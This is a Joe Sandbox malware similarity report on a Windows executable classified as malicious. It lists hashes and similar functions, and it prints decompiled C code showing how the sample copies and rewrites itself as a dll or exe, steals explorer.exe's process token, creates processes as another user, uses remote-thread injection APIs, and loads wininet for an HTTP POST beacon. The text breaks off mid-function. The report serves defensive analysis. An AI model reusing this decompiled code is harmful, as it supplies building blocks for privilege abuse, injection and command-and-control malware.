Similarity Report

Overview

General Information

Joe Sandbox Version:	24.0.0
Analysis ID:	675819
Start date:	28.09.2018
Start time:	11:18:22
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 2m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	P8Wo4avJbj (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.winEXE@1/2@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 74.4% (good quality ratio 73.1%) Quality average: 91% Quality standard deviation: 18.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 46
Cookbook Comments:	Adjust boot time Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe

Static File Info

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.006589492266663
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	P8Wo4avJbj.exe
File size:	17408
MD5:	595aff5212df3534fb8af6a587c6038e
SHA1:	1771e435ba25f9cdfa77168899490d87681f2029
SHA256:	dcbfd12321fa7c4fa9a72486ced578fdc00dcee79e6d95aa481791f044a55af3
SHA512:	281d601178ac8a1e589a3ae8ba0e324b180aa3dde121eee399448beb6752b67c0cf0add7a99913816e23d9985bf9a2b1dee7495ca018f1583cab52b30d7607e0
File Content Preview:	MZ.............j........@........................................j.......+L$.J"w.J"w.J"w.B.w.J"w'B.w.J"w.J#w.J"w.J"w.J"w.F}w.J"w.FBw.J"w.F~w.J"w.Fxw.J"wRich.J"w........PE..L...k..G.................6...........4.......P....@................................

Similarity Information

Algorithm:	APISTRING
Total Signature IDs in Database:	4802801
Total Processes Database:	56914
Total similar Processes:	3
Total similar Functions:	260

Similar Processes

P8Wo4avJbj.exe (MD5: 595AFF5212DF3534FB8AF6A587C6038E, PID: 3000)

rEF274uSok.exe (PID: 3428, MD5: CF45EC807321D12F8DF35FA434591460 AnalysisID: 57816 Similar Functions: 88)
dRoYbhso1n.exe (PID: 3428, MD5: 6EAA1FF5F33DF3169C209F98CC5012D0 AnalysisID: 57815 Similar Functions: 88)
x2f5mqUHUN.exe (PID: 3424, MD5: F391556D9F89499FA8EE757CB3472710 AnalysisID: 57817 Similar Functions: 84)

Similar Functions

Function_00003358 API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle, String ID: , Total Matches: 6
Function_00002B08 API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen, String ID: dll$exe, Total Matches: 6
Function_00002B08 API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen, String ID: dll$exe, Total Matches: 6
Function_00002C05 API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage, String ID: , Total Matches: 6
Function_00003734 API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat, String ID: [FILE]$SystemRoot$[FILE], Total Matches: 6
Function_00003358 API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle, String ID: , Total Matches: 6
Function_00001F4E API ID: lstrcpy, String ID: ($TagId, Total Matches: 6
Function_00002165 API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent, String ID: x, Total Matches: 6
Function_00001466 API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject, String ID: , Total Matches: 6
Function_00001E99 API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority, String ID: , Total Matches: 6
Function_00003094 API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess, String ID: , Total Matches: 6
Function_00002997 API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory, String ID: , Total Matches: 6
Function_00001ABC API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject, String ID: , Total Matches: 6
Function_000023B1 API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent, String ID: d, Total Matches: 6
Function_00001BAA API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject, String ID: , Total Matches: 6
Function_000035DB API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx, String ID: , Total Matches: 6
Function_000017D0 API ID: WaitForSingleObject$ReadFileResetEvent, String ID: , Total Matches: 6
Function_000019F3 API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject, String ID: , Total Matches: 6
Function_00002DE5 API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken, String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE], Total Matches: 6
Function_000027E6 API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects, String ID: <, Total Matches: 6
rpcnetp API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler, String ID: rpcnetp, Total Matches: 6
Function_00001F4E API ID: lstrcpy, String ID: ($TagId, Total Matches: 6
Function_00002165 API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent, String ID: x, Total Matches: 6
Function_00001466 API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject, String ID: , Total Matches: 6
Function_00002C05 API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage, String ID: , Total Matches: 6
Function_00003734 API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat, String ID: [FILE]$SystemRoot$[FILE], Total Matches: 6
Function_000017D0 API ID: WaitForSingleObject$ReadFileResetEvent, String ID: , Total Matches: 6
Function_000035DB API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx, String ID: , Total Matches: 6
rpcnetp API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler, String ID: rpcnetp, Total Matches: 6
Function_00002DE5 API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken, String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE], Total Matches: 6
Function_000027E6 API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects, String ID: <, Total Matches: 6
Function_000019F3 API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject, String ID: , Total Matches: 6
Function_00003094 API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess, String ID: , Total Matches: 6
Function_00002997 API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory, String ID: , Total Matches: 6
Function_00001E99 API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority, String ID: , Total Matches: 6
Function_00001BAA API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject, String ID: , Total Matches: 6
Function_000023B1 API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent, String ID: d, Total Matches: 6
Function_00001ABC API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject, String ID: , Total Matches: 6
Function_00002648 API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup, String ID: , Total Matches: 5
Function_00002CC7 API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf, String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE], Total Matches: 5
Function_00002648 API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup, String ID: , Total Matches: 5
Function_00002CC7 API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf, String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE], Total Matches: 5
Function_00003020 API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects, String ID: , Total Matches: 3
Function_00003683 API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen, String ID: , Total Matches: 3
Function_00003020 API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects, String ID: !$@, Total Matches: 3
Function_00003683 API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen, String ID: !$@, Total Matches: 3

Process Name: rEF274uSok.exe Analysis ID: 57816

General

Root Process Name:	P8Wo4avJbj.exe
Process MD5:	CF45EC807321D12F8DF35FA434591460
Total matches:	88
Initial Analysis Report:	Open
Initial sample Analysis ID:	57816
Initial sample SHA 256:	0860F29226069A732F988CB70EA6D51057D204D421BB709B8E759376B0C4D201
Initial sample name:	rEF274uSo.exe

Similar Executed Functions

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Similarity

Total matches: 6
API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
String ID: dll$exe
API String ID: 1827060118-2048111982
Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0

C-Code - Quality: 100%

			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}

0x00402b23
0x00402b2b
0x00402c02
0x00402c02
0x00402b35
0x00402b3c
0x00402b3e
0x00402b3e
0x00402b4e
0x00402b59
0x00402b5c
0x00402b65
0x00402b65
0x00402b6a
0x00402b72
0x00402b7c
0x00402b89
0x00402b91
0x00402ba0
0x00402ba6
0x00402bab
0x00402bad
0x00402bb2
0x00402bbb
0x00402bc3
0x00402bca
0x00402bd3
0x00402bcc
0x00402bcc
0x00402bcc
0x00402bdc
0x00402bdf
0x00402bf1
0x00402bf8
0x00402bf8
0x00402bab
0x00402b91
0x00000000

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
lstrlenA.KERNEL32(?), ref: 00402B5C
lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
CloseHandle.KERNEL32(00000000), ref: 00402BF8

Strings

exe, xrefs: 00402B3E
dll, xrefs: 00402B35

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Similarity

Total matches: 6
API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
String ID:
API String ID: 4158509741-0
Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8

C-Code - Quality: 96%

			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}

0x0040335c
0x00403364
0x0040336a
0x0040336f
0x00403375
0x00403375
0x0040337d
0x00403386
0x0040338a
0x00403395
0x00403399
0x004033fb
0x004033fb
0x00403400
0x00403402
0x0040340f
0x00403412
0x00403476
0x0040347c
0x00403482
0x00403482
0x00403485
0x00403485
0x00403414
0x00403416
0x0040341d
0x00403427
0x0040342c
0x00403440
0x00403442
0x00403444
0x00403446
0x0040344b
0x00403453
0x00403458
0x00403460
0x00403462
0x00403462
0x0040346b
0x0040346e
0x0040346e
0x00403470
0x00403471
0x00000000
0x00403471
0x00403418
0x0040341b
0x00000000
0x00000000
0x00000000
0x0040341b
0x00403404
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x0040339b
0x004033a0
0x004033a6
0x004033a9
0x004033e9
0x004033f5
0x00000000
0x004033f5
0x004033ab
0x004033ba
0x004033bc
0x004033c2
0x004033c9
0x004033d2
0x004033d4
0x004033d7
0x004033da
0x004033da
0x004033de
0x00000000
0x004033e0
0x00000000
0x004033e0

APIs

GetVersion.KERNEL32 ref: 0040335C
GetStdHandle.KERNEL32(000000F4), ref: 00403380

Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1

SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5

Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04

Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B

CloseHandle.KERNEL32(00000000), ref: 004033DA
ExitProcess.KERNEL32 ref: 00403485

Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
CloseHandle.KERNEL32 ref: 00403460
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
CloseHandle.KERNEL32(00000000), ref: 0040346E
CloseHandle.KERNEL32(?), ref: 00403482

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Similarity

Total matches: 6
API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
API String ID: 871439847-2760969069
Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3

C-Code - Quality: 96%

			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}

0x001d2de5
0x001d2de7
0x001d2dec
0x001d2df1
0x001d2df5
0x001d2dfa
0x001d2e09
0x001d2e0b
0x001d2e10
0x001d2eec
0x001d2ef0
0x001d2ef5
0x001d2ef5
0x001d2eff
0x001d2f04
0x001d2f04
0x001d2f12
0x001d2f12
0x001d2e22
0x001d2e24
0x001d2e29
0x00000000
0x00000000
0x001d2e35
0x001d2e37
0x001d2e3c
0x00000000
0x00000000
0x001d2e47
0x001d2e4a
0x001d2e50
0x001d2e55
0x00000000
0x00000000
0x001d2e64
0x001d2e68
0x001d2e7d
0x00000000
0x00000000
0x001d2e7f
0x001d2e81
0x00000000
0x00000000
0x001d2e83
0x001d2e86
0x001d2e8a
0x001d2e8a
0x001d2e8d
0x001d2e92
0x00000000
0x00000000
0x001d2e9a
0x001d2ea1
0x00000000
0x00000000
0x001d2eb2
0x001d2eb4
0x001d2eb9
0x001d2ec5
0x001d2ecc
0x001d2ecc
0x001d2ee8
0x001d2ee8
0x00000000
0x001d2ed4
0x001d2ed4
0x001d2ed8
0x00000000
0x00000000
0x001d2eda
0x001d2edc
0x001d2edc
0x001d2e8a
0x001d2e6d
0x001d2e73
0x001d2e77
0x00000000
0x001d2e77
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
CloseHandle.KERNEL32(00000000), ref: 001D2ECC
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04

Strings

ntdll.dll, xrefs: 001D2DFE
_wcsicmp, xrefs: 001D2E2F
explorer.exe, xrefs: 001D2E94
NtQuerySystemInformation, xrefs: 001D2E16

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Similarity

Total matches: 5
API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
API String ID: 3761191649-3458657377
Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc

C-Code - Quality: 94%

			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
